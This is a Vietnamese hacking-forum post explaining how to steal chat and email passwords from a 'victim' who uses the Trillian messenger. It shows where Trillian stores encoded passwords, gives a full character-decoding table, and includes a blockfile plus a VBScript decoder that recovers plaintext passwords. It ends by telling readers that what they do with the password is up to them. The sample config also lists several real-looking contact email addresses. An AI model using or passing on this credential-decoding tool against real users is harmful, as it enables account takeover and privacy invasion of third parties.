Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Thu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin

Shopmotion


Affiliates
free forum


Hack hotmail, aol, yahoo, icq pass, nếu victim dùng trillian

Go down

Hack hotmail, aol, yahoo, icq pass, nếu victim dùng trillian

Post  Admin on Tue Dec 28, 2010 9:05 am

Ðây là cách lấy pass của victim khi victim dùng trilian dowload tại www.trillian.cc
một chương trình khá phổ biến và được rất nhiều dân chat dùng do tính tiện
lợi của nó, có thể login nhiều ID vào cùng một lúc (all in one heheh yahoo, hotmai,
aol, icq, ), không bị kick vvv, tuy nhiên qua đây ta có thể lấy pass của họ dễ
dàng, các password được chứa trong thư mục user thường là có đường dẫn sau


c:\programe files\trillian\users\*users name*\
của tớ là
C:\Program Files\Trillian\users\default

ví dụ muốn xem nội dung pass của msn (hotmail ) ta vào .
C:\Program Files\Trillian\users\default\msn.ini

files msn của tớ có nội dung là :
[msn]
last msn=Never connected
connect num=10
connect sec=60
save status=1
auto hotmail=1
ft port=6891
[profile 0]
name=xxxxxxxminh@hotmail.com
password=9E4FEFACxxxxxxxxxxxxxxx
display name=xxxxxx
auto connect=1
status=1
reverse0=shichuan_yangyi@msn.com
reverse1=nguyenminhhuy@hotmail.com
reverse2=apomexus@hotmail.com
reverse3=whatvn@hotmail.com
dia chi email
...................................
...................................
bạn sẽ thấy password có nội dung là 9E4FEFxxxxxxxxxx
(do tớ không dám post hết ra nên để xxxxx )
sau đây là Trillian encodes passwords.

Mỗi một chữ bình thường sẽ được encode 2 chữ số khác nhau .


l | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
---------------------------------------------------
a | 92 47 E0 A5 58 E7 BA F3 10 C2 D8 87 32 1B F4 1D
b | 91 44 E3 A6 5B E4 B9 F0 13 C1 DB 84 31 18 F7 1E
c | 90 45 E2 A7 5A E5 B8 F1 12 C0 DA 85 30 19 F6 1F
d | 97 42 E5 A0 5D E2 BF F6 15 C7 DD 82 37 1E F1 18
e | 96 43 E4 A1 5C E3 BE F7 14 C6 DC 83 36 1F F0 19
f | 95 40 E7 A2 5F E0 BD F4 17 C5 DF 80 35 1C F3 1A
g | 94 41 E6 A3 5E E1 BC F5 16 C4 DE 81 34 1D F2 1B
h | 9B 4E E9 AC 51 EE B3 FA 19 CB D1 8E 3B 12 FD 14
i | 9A 4F E8 AD 50 EF B2 FB 18 CA D0 8F 3A 13 FC 15
j | 99 4C EB AE 53 EC B1 F8 1B C9 D3 8C 39 10 FF 16
k | 98 4D EA AF 52 ED B0 F9 1A C8 D2 8D 38 11 FE 17
l | 9F 4A ED A8 55 EA B7 FE 1D CF D5 8A 3F 16 F9 10
m | 9E 4B EC A9 54 EB B6 FF 1C CE D4 8B 3E 17 F8 11
n | 9D 48 EF AA 57 E8 B5 FC 1F CD D7 88 3D 14 FB 12
o | 9C 49 EE AB 56 E9 B4 FD 1E CC D6 89 3C 15 FA 13
p | 83 56 F1 B4 49 F6 AB E2 01 D3 C9 96 23 0A E5 0C
q | 82 57 F0 B5 48 F7 AA E3 00 D2 C8 97 22 0B E4 0D
r | 81 54 F3 B6 4B F4 A9 E0 03 D1 CB 94 21 08 E7 0E
s | 80 55 F2 B7 4A F5 A8 E1 02 D0 CA 95 20 09 E6 0F
t | 87 52 F5 B0 4D F2 AF E6 05 D7 CD 92 27 0E E1 08
u | 86 53 F4 B1 4C F3 AE E7 04 D6 CC 93 26 0F E0 09
v | 85 50 F7 B2 4F F0 AD E4 07 D5 CF 90 25 0C E3 0A
w | 84 51 F6 B3 4E F1 AC E5 06 D4 CE 91 24 0D E2 0B
x | 8B 5E F9 BC 41 FE A3 EA 09 DB C1 9E 2B 02 ED 04
y | 8A 5F F8 BD 40 FF A2 EB 08 DA C0 9F 2A 03 EC 05
z | 89 5C FB BE 43 FC A1 E8 0B D9 C3 9C 29 00 EF 06
A | B2 67 C0 85 78 C7 9A D3 30 E2 F8 A7 12 3B D4 3D
B | B1 64 C3 86 7B C4 99 D0 33 E1 FB A4 11 38 D7 3E
C | B0 65 C2 87 7A C5 98 D1 32 E0 FA A5 10 39 D6 3F
D | B7 62 C5 80 7D C2 9F D6 35 E7 FD A2 17 3E D1 38
E | B6 63 C4 81 7C C3 9E D7 34 E6 FC A3 16 3F D0 39
F | B5 60 C7 82 7F C0 9D D4 37 E5 FF A0 15 3C D3 3A
G | B4 61 C6 83 7E C1 9C D5 36 E4 FE A1 14 3D D2 3B
H | BB 6E C9 8C 71 CE 93 DA 39 EB F1 AE 1B 32 DD 34
I | BA 6F C8 8D 70 CF 92 DB 38 EA F0 AF 1A 33 DC 35
J | B9 6C CB 8E 73 CC 91 D8 3B E9 F3 AC 19 30 DF 36
K | B8 6D CA 8F 72 CD 90 D9 3A E8 F2 AD 18 31 DE 37
L | BF 6A CD 88 75 CA 97 DE 3D EF F5 AA 1F 36 D9 30
M | BE 6B CC 89 74 CB 96 DF 3C EE F4 AB 1E 37 D8 31
N | BD 68 CF 8A 77 C8 95 DC 3F ED F7 A8 1D 34 DB 32
O | BC 69 CE 8B 76 C9 94 DD 3E EC F6 A9 1C 35 DA 33
P | A3 76 D1 94 69 D6 8B C2 21 F3 E9 B6 03 2A C5 2C
Q | A2 77 D0 95 68 D7 8A C3 20 F2 E8 B7 02 2B C4 2D
R | A1 74 D3 96 6B D4 89 C0 23 F1 EB B4 01 28 C7 2E
S | A0 75 D2 97 6A D5 88 C1 22 F0 EA B5 00 29 C6 2F
T | A7 72 D5 90 6D D2 8F C6 25 F7 ED B2 07 2E C1 28
U | A6 73 D4 91 6C D3 8E C7 24 F6 EC B3 06 2F C0 29
V | A5 70 D7 92 6F D0 8D C4 27 F5 EF B0 05 2C C3 2A
W | A4 71 D6 93 6E D1 8C C5 26 F4 EE B1 04 2D C2 2B
X | AB 7E D9 9C 61 DE 83 CA 29 FB E1 BE 0B 22 CD 24
Y | AA 7F D8 9D 60 DF 82 CB 28 FA E0 BF 0A 23 CC 25
Z | A9 7C DB 9E 63 DC 81 C8 2B F9 E3 BC 09 20 CF 26
0 | C3 16 B1 F4 09 B6 EB A2 41 93 89 D6 63 4A A5 4C
1 | C2 17 B0 F5 08 B7 EA A3 40 92 88 D7 62 4B A4 4D
2 | C1 14 B3 F6 0B B4 E9 A0 43 91 8B D4 61 48 A7 4E
3 | C0 15 B2 F7 0A B5 E8 A1 42 90 8A D5 60 49 A6 4F
4 | C7 12 B5 F0 0D B2 EF A6 45 97 8D D2 67 4E A1 48
5 | C6 13 B4 F1 0C B3 EE A7 44 96 8C D3 66 4F A0 49
6 | C5 10 B7 F2 0F B0 ED A4 47 95 8F D0 65 4C A3 4A
7 | C4 11 B6 F3 0E B1 EC A5 46 94 8E D1 64 4D A2 4B
8 | CB 1E B9 FC 01 BE E3 AA 49 9B 81 DE 6B 42 AD 44
9 | CA 1F B8 FD 00 BF E2 AB 48 9A 80 DF 6A 43 AC 45
| D3 06 A1 E4 19 A6 FB B2 51 83 99 C6 73 5A B5 5C
~ | 8D 58 FF BA 47 F8 A5 EC 0F DD C7 98 2D 04 EB 02
` | 93 46 E1 A4 59 E6 BB F2 11 C3 D9 86 33 1A F5 1C
! | D2 07 A0 E5 18 A7 FA B3 50 82 98 C7 72 5B B4 5D
@ | B3 66 C1 84 79 C6 9B D2 31 E3 F9 A6 13 3A D5 3C
# | D0 05 A2 E7 1A A5 F8 B1 52 80 9A C5 70 59 B6 5F
$ | D7 02 A5 E0 1D A2 FF B6 55 87 9D C2 77 5E B1 58
% | D6 03 A4 E1 1C A3 FE B7 54 86 9C C3 76 5F B0 59
^ | AD 78 DF 9A 67 D8 85 CC 2F FD E7 B8 0D 24 CB 22
& | D5 00 A7 E2 1F A0 FD B4 57 85 9F C0 75 5C B3 5A
* | D9 0C AB EE 13 AC F1 B8 5B 89 93 CC 79 50 BF 56
( | DB 0E A9 EC 11 AE F3 BA 59 8B 91 CE 7B 52 BD 54
) | DA 0F A8 ED 10 AF F2 BB 58 8A 90 CF 7A 53 BC 55
_ | AC 79 DE 9B 66 D9 84 CD 2E FC E6 B9 0C 25 CA 23
- | DE 0B AC E9 14 AB F6 BF 5C 8E 94 CB 7E 57 B8 51
+ | D8 0D AA EF 12 AD F0 B9 5A 88 92 CD 78 51 BE 57
= | CE 1B BC F9 04 BB E6 AF 4C 9E 84 DB 6E 47 A8 41
{ | 88 5D FA BF 42 FD A0 E9 0A D8 C2 9D 28 01 EE 07
[ | A8 7D DA 9F 62 DD 80 C9 2A F8 E2 BD 08 21 CE 27
} | 8E 5B FC B9 44 FB A6 EF 0C DE C4 9B 2E 07 E8 01
] | AE 7B DC 99 64 DB 86 CF 2C FE E4 BB 0E 27 C8 21
| | 8F 5A FD B8 45 FA A7 EE 0D DF C5 9A 2F 06 E9 00
\ | AF 7A DD 98 65 DA 87 CE 2D FF E5 BA 0F 26 C9 20
: | C9 1C BB FE 03 BC E1 A8 4B 99 83 DC 69 40 AF 46
; | C8 1D BA FF 02 BD E0 A9 4A 98 82 DD 68 41 AE 47
" | D1 04 A3 E6 1B A4 F9 B0 53 81 9B C4 71 58 B7 5E
' | D4 01 A6 E3 1E A1 FC B5 56 84 9E C1 74 5D B2 5B
< | CF 1A BD F8 05 BA E7 AE 4D 9F 85 DA 6F 46 A9 40
, | DF 0A AD E8 15 AA F7 BE 5D 8F 95 CA 7F 56 B9 50
>| CD 18 BF FA 07 B8 E5 AC 4F 9D 87 D8 6D 44 AB 42
. | DD 08 AF EA 17 A8 F5 BC 5F 8D 97 C8 7D 54 BB 52
? | CC 19 BE FB 06 B9 E4 AD 4E 9C 86 D9 6C 45 AA 43
/ | DC 09 AE EB 16 A9 F4 BD 5E 8C 96 C9 7C 55 BA 53
。 | 52 87 20 65 98 27 7A 33 D0 02 18 47 F2 DB 34 DD
「 | 51 84 23 66 9B 24 79 30 D3 01 1B 44 F1 D8 37 DE
」 | 50 85 22 67 9A 25 78 31 D2 00 1A 45 F0 D9 36 DF
、 | 57 82 25 60 9D 22 7F 36 D5 07 1D 42 F7 DE 31 D8
・ | 56 83 24 61 9C 23 7E 37 D4 06 1C 43 F6 DF 30 D9
ヲ | 55 80 27 62 9F 20 7D 34 D7 05 1F 40 F5 DC 33 DA
ァ | 54 81 26 63 9E 21 7C 35 D6 04 1E 41 F4 DD 32 DB
ィ | 5B 8E 29 6C 91 2E 73 3A D9 0B 11 4E FB D2 3D D4
ゥ | 5A 8F 28 6D 90 2F 72 3B D8 0A 10 4F FA D3 3C D5
ェ | 59 8C 2B 6E 93 2C 71 38 DB 09 13 4C F9 D0 3F D6
ォ | 58 8D 2A 6F 92 2D 70 39 DA 08 12 4D F8 D1 3E D7
ャ | 5F 8A 2D 68 95 2A 77 3E DD 0F 15 4A FF D6 39 D0
ョ | 5D 88 2F 6A 97 28 75 3C DF 0D 17 48 FD D4 3B D2
ッ | 5C 89 2E 6B 96 29 74 3D DE 0C 16 49 FC D5 3A D3
ー | 43 96 31 74 89 36 6B 22 C1 13 09 56 E3 CA 25 CC
ア | 42 97 30 75 88 37 6A 23 C0 12 08 57 E2 CB 24 CD
イ | 41 94 33 76 8B 34 69 20 C3 11 0B 54 E1 C8 27 CE
ウ | 40 95 32 77 8A 35 68 21 C2 10 0A 55 E0 C9 26 CF
エ | 47 92 35 70 8D 32 6F 26 C5 17 0D 52 E7 CE 21 C8
オ | 46 93 34 71 8C 33 6E 27 C4 16 0C 53 E6 CF 20 C9
カ | 45 90 37 72 8F 30 6D 24 C7 15 0F 50 E5 CC 23 CA
キ | 44 91 36 73 8E 31 6C 25 C6 14 0E 51 E4 CD 22 CB
ク | 4B 9E 39 7C 81 3E 63 2A C9 1B 01 5E EB C2 2D C4
ケ | 4A 9F 38 7D 80 3F 62 2B C8 1A 00 5F EA C3 2C C5
コ | 49 9C 3B 7E 83 3C 61 28 CB 19 03 5C E9 C0 2F C6
サ | 48 9D 3A 7F 82 3D 60 29 CA 18 02 5D E8 C1 2E C7
シ | 4F 9A 3D 78 85 3A 67 2E CD 1F 05 5A EF C6 29 C0
ス | 4E 9B 3C 79 84 3B 66 2F CC 1E 04 5B EE C7 28 C1
セ | 4D 98 3F 7A 87 38 65 2C CF 1D 07 58 ED C4 2B C2
ソ | 4C 99 3E 7B 86 39 64 2D CE 1C 06 59 EC C5 2A C3
タ | 33 E6 41 04 F9 46 1B 52 B1 63 79 26 93 BA 55 BC
チ | 32 E7 40 05 F8 47 1A 53 B0 62 78 27 92 BB 54 BD
ツ | 31 E4 43 06 FB 44 19 50 B3 61 7B 24 91 B8 57 BE
テ | 30 E5 42 07 FA 45 18 51 B2 60 7A 25 90 B9 56 BF
ト | 37 E2 45 00 FD 42 1F 56 B5 67 7D 22 97 BE 51 B8
ナ | 36 E3 44 01 FC 43 1E 57 B4 66 7C 23 96 BF 50 B9
ニ | 35 E0 47 02 FF 40 1D 54 B7 65 7F 20 95 BC 53 BA
ヌ | 34 E1 46 03 FE 41 1C 55 B6 64 7E 21 94 BD 52 BB
ネ | 3B EE 49 0C F1 4E 13 5A B9 6B 71 2E 9B B2 5D B4
ノ | 3A EF 48 0D F0 4F 12 5B B8 6A 70 2F 9A B3 5C B5
ハ | 39 EC 4B 0E F3 4C 11 58 BB 69 73 2C 99 B0 5F B6
ヒ | 38 ED 4A 0F F2 4D 10 59 BA 68 72 2D 98 B1 5E B7
フ | 3F EA 4D 08 F5 4A 17 5E BD 6F 75 2A 9F B6 59 B0
ヘ | 3E EB 4C 09 F4 4B 16 5F BC 6E 74 2B 9E B7 58 B1
ホ | 3D E8 4F 0A F7 48 15 5C BF 6D 77 28 9D B4 5B B2
マ | 3C E9 4E 0B F6 49 14 5D BE 6C 76 29 9C B5 5A B3
ミ | 23 F6 51 14 E9 56 0B 42 A1 73 69 36 83 AA 45 AC
ム | 22 F7 50 15 E8 57 0A 43 A0 72 68 37 82 AB 44 AD
メ | 21 F4 53 16 EB 54 09 40 A3 71 6B 34 81 A8 47 AE
モ | 20 F5 52 17 EA 55 08 41 A2 70 6A 35 80 A9 46 AF
ヤ | 27 F2 55 10 ED 52 0F 46 A5 77 6D 32 87 AE 41 A8
ユ | 26 F3 54 11 EC 53 0E 47 A4 76 6C 33 86 AF 40 A9
ヨ | 25 F0 57 12 EF 50 0D 44 A7 75 6F 30 85 AC 43 AA
ラ | 24 F1 56 13 EE 51 0C 45 A6 74 6E 31 84 AD 42 AB
リ | 2B FE 59 1C E1 5E 03 4A A9 7B 61 3E 8B A2 4D A4
ル | 2A FF 58 1D E0 5F 02 4B A8 7A 60 3F 8A A3 4C A5
レ | 29 FC 5B 1E E3 5C 01 48 AB 79 63 3C 89 A0 4F A6
ロ | 28 FD 5A 1F E2 5D 00 49 AA 78 62 3D 88 A1 4E A7
ワ | 2F FA 5D 18 E5 5A 07 4E AD 7F 65 3A 8F A6 49 A0
ン | 2E FB 5C 19 E4 5B 06 4F AC 7E 64 3B 8E A7 48 A1
゙ | 2D F8 5F 1A E7 58 05 4C AF 7D 67 38 8D A4 4B A2
゚ | 2C F9 5E 1B E6 59 04 4D AE 7C 66 39 8C A5 4A A3
・| 13 C6 61 24 D9 66 3B 72 91 43 59 06 B3 9A 75 9C
・| 12 C7 60 25 D8 67 3A 73 90 42 58 07 B2 9B 74 9D
・| 11 C4 63 26 DB 64 39 70 93 41 5B 04 B1 98 77 9E
・| 10 C5 62 27 DA 65 38 71 92 40 5A 05 B0 99 76 9F
・| 17 C2 65 20 DD 62 3F 76 95 47 5D 02 B7 9E 71 98
・| 16 C3 64 21 DC 63 3E 77 94 46 5C 03 B6 9F 70 99
・| 15 C0 67 22 DF 60 3D 74 97 45 5F 00 B5 9C 73 9A
・| 14 C1 66 23 DE 61 3C 75 96 44 5E 01 B4 9D 72 9B
・| 1B CE 69 2C D1 6E 33 7A 99 4B 51 0E BB 92 7D 94
・| 1A CF 68 2D D0 6F 32 7B 98 4A 50 0F BA 93 7C 95
・| 19 CC 6B 2E D3 6C 31 78 9B 49 53 0C B9 90 7F 96
・| 18 CD 6A 2F D2 6D 30 79 9A 48 52 0D B8 91 7E 97
・| 1F CA 6D 28 D5 6A 37 7E 9D 4F 55 0A BF 96 79 90
・| 1E CB 6C 29 D4 6B 36 7F 9C 4E 54 0B BE 97 78 91
・| 1D C8 6F 2A D7 68 35 7C 9F 4D 57 08 BD 94 7B 92
・| 1C C9 6E 2B D6 69 34 7D 9E 4C 56 09 BC 95 7A 93
・| 03 D6 71 34 C9 76 2B 62 81 53 49 16 A3 8A 65 8C
・| 02 D7 70 35 C8 77 2A 63 80 52 48 17 A2 8B 64 8D
・| 01 D4 73 36 CB 74 29 60 83 51 4B 14 A1 88 67 8E
・| 00 D5 72 37 CA 75 28 61 82 50 4A 15 A0 89 66 8F
・| 07 D2 75 30 CD 72 2F 66 85 57 4D 12 A7 8E 61 88
・| 06 D3 74 31 CC 73 2E 67 84 56 4C 13 A6 8F 60 89
・| 05 D0 77 32 CF 70 2D 64 87 55 4F 10 A5 8C 63 8A
・| 04 D1 76 33 CE 71 2C 65 86 54 4E 11 A4 8D 62 8B
・| 0B DE 79 3C C1 7E 23 6A 89 5B 41 1E AB 82 6D 84
・| 0A DF 78 3D C0 7F 22 6B 88 5A 40 1F AA 83 6C 85
・| 09 DC 7B 3E C3 7C 21 68 8B 59 43 1C A9 80 6F 86
・| 08 DD 7A 3F C2 7D 20 69 8A 58 42 1D A8 81 6E 87
・| 0F DA 7D 38 C5 7A 27 6E 8D 5F 45 1A AF 86 69 80
 | 0E DB 7C 39 C4 7B 26 6F 8C 5E 44 1B AE 87 68 81
 | 0D D8 7F 3A C7 78 25 6C 8F 5D 47 18 AD 84 6B 82
 | 0C D9 7E 3B C6 79 24 6D 8E 5C 46 19 AC 85 6A 83
xem password đã encode và so sánh với bản này ta sẽ tìm ra pass.
theo ví dụ trên 9E4FEFxxxxxxxxxxxxxxx
đầu tiên lấy 2 chữ số 1 nhé, 9E tra với bản encode trên ta se duoc là 9E="m"
sau đó lần lược 4F="i", ,,,,,,,,,,,,,cứ thế.
sau khi lấy được pass rồi, làm gì thì tùy bạn.
Còn một phương pháp này không cần phải tra dùng vb để thuc hanh chức năng kiểm tra hộ mình.
Copy nội dung sau và save thành file tên là blockfile.txt
blockfile.txt":
------ cut here ------
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
~`!@#$%^&*()_-+={[}]|\:;"'<,>.?/。「」、・ヲァィゥェォャョッーアイウエオカキクケコサシスセソタチツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚珮粤蒟跚韜・・ⅰ涇・
929190979695949B9A99989F9E9D9C83828180878685848B8A89B2B1B0B7B6B5B4BBBAB9B8BFBEBDBCA3A2A1A0

A7A6A5A4ABAAA9C3C2C1C0C7C6C5C4CBCAD38D93D2B3D0D7D6ADD5D9DBDAACDED8CE88A88EAE8FAFC9C8D1D4CF

DFCDDDCCDC525150575655545B5A59585F5D5C43424140474645444B4A49484F4E4D4C33323130373635343B3A

39383F3E3D3C23222120272625242B2A29282F2E2D2C13121110171615141B1A19181F1E1D1C03020100070605

040B0A09080F0E0D0C
474445424340414E4F4C4D4A4B484956575455525350515E5F5C676465626360616E6F6C6D6A6B686976777475

727370717E7F7C16171415121310111E1F065846076605020378000C0E0F790B0D1B5D7D5B7B5A7A1C1D04011A

0A18081909878485828380818E8F8C8D8A888996979495929390919E9F9C9D9A9B9899E6E7E4E5E2E3E0E1EEEF

ECEDEAEBE8E9F6F7F4F5F2F3F0F1FEFFFCFDFAFBF8F9C6C7C4C5C2C3C0C1CECFCCCDCACBC8C9D6D7D4D5D2D3D0

D1DEDFDCDDDADBD8D9
E0E3E2E5E4E7E6E9E8EBEAEDECEFEEF1F0F3F2F5F4F7F6F9F8FBC0C3C2C5C4C7C6C9C8CBCACDCCCFCED1D0D3D2

D5D4D7D6D9D8DBB1B0B3B2B5B4B7B6B9B8A1FFE1A0C1A2A5A4DFA7ABA9A8DEACAABCFADAFCDCFDDDBBBAA3A6BD

ADBFAFBEAE2023222524272629282B2A2D2F2E313033323534373639383B3A3D3C3F3E41404342454447464948

4B4A4D4C4F4E515053525554575659585B5A5D5C5F5E616063626564676669686B6A6D6C6F6E71707372757477

7679787B7A7D7C7F7E
A5A6A7A0A1A2A3ACADAEAFA8A9AAABB4B5B6B7B0B1B2B3BCBDBE858687808182838C8D8E8F88898A8B94959697

909192939C9D9EF4F5F6F7F0F1F2F3FCFDE4BAA4E584E7E0E19AE2EEECED9BE9EFF9BF9FB999B898FEFFE6E3F8

E8FAEAFBEB656667606162636C6D6E6F686A6B74757677707172737C7D7E7F78797A7B04050607000102030C0D

0E0F08090A0B14151617101112131C1D1E1F18191A1B24252627202122232C2D2E2F28292A2B34353637303132

333C3D3E3F38393A3B
585B5A5D5C5F5E515053525554575649484B4A4D4C4F4E414043787B7A7D7C7F7E717073727574777669686B6A

6D6C6F6E61606309080B0A0D0C0F0E010019475918791A1D1C671F1311106614120442624464456503021B1E05

1507170616989B9A9D9C9F9E9190939295979689888B8A8D8C8F8E8180838285848786F9F8FBFAFDFCFFFEF1F0

F3F2F5F4F7F6E9E8EBEAEDECEFEEE1E0E3E2E5E4E7E6D9D8DBDADDDCDFDED1D0D3D2D5D4D7D6C9C8CBCACDCCCF

CEC1C0C3C2C5C4C7C6
E7E4E5E2E3E0E1EEEFECEDEAEBE8E9F6F7F4F5F2F3F0F1FEFFFCC7C4C5C2C3C0C1CECFCCCDCACBC8C9D6D7D4D5

D2D3D0D1DEDFDCB6B7B4B5B2B3B0B1BEBFA6F8E6A7C6A5A2A3D8A0ACAEAFD9ABADBBFDDDFBDBFADABCBDA4A1BA

AAB8A8B9A9272425222320212E2F2C2D2A282936373435323330313E3F3C3D3A3B383946474445424340414E4F

4C4D4A4B484956575455525350515E5F5C5D5A5B585966676465626360616E6F6C6D6A6B686976777475727370

717E7F7C7D7A7B7879
BAB9B8BFBEBDBCB3B2B1B0B7B6B5B4ABAAA9A8AFAEADACA3A2A19A99989F9E9D9C93929190979695948B8A8988

8F8E8D8C838281EBEAE9E8EFEEEDECE3E2FBA5BBFA9BF8FFFE85FDF1F3F284F6F0E6A080A686A787E1E0F9FCE7

F7E5F5E4F47A79787F7E7D7C737271707775746B6A69686F6E6D6C63626160676665641B1A19181F1E1D1C1312

1110171615140B0A09080F0E0D0C03020100070605043B3A39383F3E3D3C33323130373635342B2A29282F2E2D

2C2322212027262524
F3F0F1F6F7F4F5FAFBF8F9FEFFFCFDE2E3E0E1E6E7E4E5EAEBE8D3D0D1D6D7D4D5DADBD8D9DEDFDCDDC2C3C0C1

C6C7C4C5CACBC8A2A3A0A1A6A7A4A5AAABB2ECF2B3D2B1B6B7CCB4B8BABBCDBFB9AFE9C9EFCFEECEA8A9B0B5AE

BEACBCADBD333031363734353A3B38393E3C3D22232021262724252A2B28292E2F2C2D52535051565754555A5B

58595E5F5C5D42434041464744454A4B48494E4F4C4D72737071767774757A7B78797E7F7C7D62636061666764

656A6B68696E6F6C6D
1013121514171619181B1A1D1C1F1E010003020504070609080B3033323534373639383B3A3D3C3F3E21202322

2524272629282B41404342454447464948510F1150315255542F575B59582E5C5A4C0A2A0C2C0D2D4B4A53564D

5D4F5F4E5ED0D3D2D5D4D7D6D9D8DBDADDDFDEC1C0C3C2C5C4C7C6C9C8CBCACDCCCFCEB1B0B3B2B5B4B7B6B9B8

BBBABDBCBFBEA1A0A3A2A5A4A7A6A9A8ABAAADACAFAE919093929594979699989B9A9D9C9F9E81808382858487

8689888B8A8D8C8F8E
C2C1C0C7C6C5C4CBCAC9C8CFCECDCCD3D2D1D0D7D6D5D4DBDAD9E2E1E0E7E6E5E4EBEAE9E8EFEEEDECF3F2F1F0

F7F6F5F4FBFAF993929190979695949B9A83DDC382E3808786FD85898B8AFC8E889ED8F8DEFEDFFF999881849F

8F9D8D9C8C020100070605040B0A09080F0D0C13121110171615141B1A19181F1E1D1C63626160676665646B6A

69686F6E6D6C73727170777675747B7A79787F7E7D7C43424140474645444B4A49484F4E4D4C53525150575655

545B5A59585F5E5D5C
D8DBDADDDCDFDED1D0D3D2D5D4D7D6C9C8CBCACDCCCFCEC1C0C3F8FBFAFDFCFFFEF1F0F3F2F5F4F7F6E9E8EBEA

EDECEFEEE1E0E389888B8A8D8C8F8E818099C7D998F99A9D9CE79F939190E6949284C2E2C4E4C5E583829B9E85

9587978696181B1A1D1C1F1E1110131215171609080B0A0D0C0F0E010003020504070679787B7A7D7C7F7E7170

73727574777669686B6A6D6C6F6E616063626564676659585B5A5D5C5F5E515053525554575649484B4A4D4C4F

4E4140434245444746
878485828380818E8F8C8D8A8B888996979495929390919E9F9CA7A4A5A2A3A0A1AEAFACADAAABA8A9B6B7B4B5

B2B3B0B1BEBFBCD6D7D4D5D2D3D0D1DEDFC69886C7A6C5C2C3B8C0CCCECFB9CBCDDB9DBD9BBB9ABADCDDC4C1DA

CAD8C8D9C9474445424340414E4F4C4D4A484956575455525350515E5F5C5D5A5B585926272425222320212E2F

2C2D2A2B282936373435323330313E3F3C3D3A3B383906070405020300010E0F0C0D0A0B080916171415121310

111E1F1C1D1A1B1819
323130373635343B3A39383F3E3D3C23222120272625242B2A29121110171615141B1A19181F1E1D1C03020100

070605040B0A0963626160676665646B6A732D3372137077760D75797B7A0C7E786E28082E0E2F0F696871746F

7F6D7D6C7CF2F1F0F7F6F5F4FBFAF9F8FFFDFCE3E2E1E0E7E6E5E4EBEAE9E8EFEEEDEC93929190979695949B9A

99989F9E9D9C83828180878685848B8A89888F8E8D8CB3B2B1B0B7B6B5B4BBBAB9B8BFBEBDBCA3A2A1A0A7A6A5

A4ABAAA9A8AFAEADAC
1B18191E1F1C1D12131011161714150A0B08090E0F0C0D0203003B38393E3F3C3D32333031363734352A2B2829

2E2F2C2D2223204A4B48494E4F4C4D42435A041A5B3A595E5F245C505253255751470121072706264041585D46

5644544555DBD8D9DEDFDCDDD2D3D0D1D6D4D5CACBC8C9CECFCCCDC2C3C0C1C6C7C4C5BABBB8B9BEBFBCBDB2B3

B0B1B6B7B4B5AAABA8A9AEAFACADA2A3A0A1A6A7A4A59A9B98999E9F9C9D92939091969794958A8B88898E8F8C

8D8283808186878485
F4F7F6F1F0F3F2FDFCFFFEF9F8FBFAE5E4E7E6E1E0E3E2EDECEFD4D7D6D1D0D3D2DDDCDFDED9D8DBDAC5C4C7C6

C1C0C3C2CDCCCFA5A4A7A6A1A0A3A2ADACB5EBF5B4D5B6B1B0CBB3BFBDBCCAB8BEA8EECEE8C8E9C9AFAEB7B2A9

B9ABBBAABA343736313033323D3C3F3E393B3A25242726212023222D2C2F2E29282B2A55545756515053525D5C

5F5E59585B5A45444746414043424D4C4F4E49484B4A75747776717073727D7C7F7E79787B7A65646766616063

626D6C6F6E69686B6A
1D1E1F18191A1B14151617101112130C0D0E0F08090A0B0405063D3E3F38393A3B34353637303132332C2D2E2F

28292A2B2425264C4D4E4F48494A4B44455C021C5D3C5F5859225A5654552351574107270121002046475E5B40

5042524353DDDEDFD8D9DADBD4D5D6D7D0D2D3CCCDCECFC8C9CACBC4C5C6C7C0C1C2C3BCBDBEBFB8B9BABBB4B5

B6B7B0B1B2B3ACADAEAFA8A9AAABA4A5A6A7A0A1A2A39C9D9E9F98999A9B94959697909192938C8D8E8F88898A

8B8485868780818283
=========cut here===============
cut nội dung sau và save thành rillian_password_decoder.vbs":
------ cut here ------
dim fso
set fso = createobject("scripting.filesystemobject")
const ForReading = 1
set blockfile = fso.opentextfile("blockfile.txt", ForReading)
password = inputbox("Password (Encoded Trillian passwords are only 32
characters in length)")
length_password = len(password)
if length_password > 32 then password = mid(password,1,32) : length_password
= 32
password_timer = 1
all_char = blockfile.readline
do until password_timer > length_password
block_timer = 1
all_char_timer = 1
ablock = blockfile.readline
password_chars = mid(password,password_timer,2)
do
if all_char_timer = 378 then msgbox("Doesn't Match")
if password_chars = mid(ablock,block_timer,2) then realpassword
= realpassword & mid(all_char,all_char_timer,1) : exit do
block_timer = block_timer + 2
all_char_timer = all_char_timer + 1
loop
password_timer = password_timer + 2
loop
ablock.close
the_real_password = inputbox("", "", realpassword)
=======cuthere=================

Admin
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile http://hackis.forumvi.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum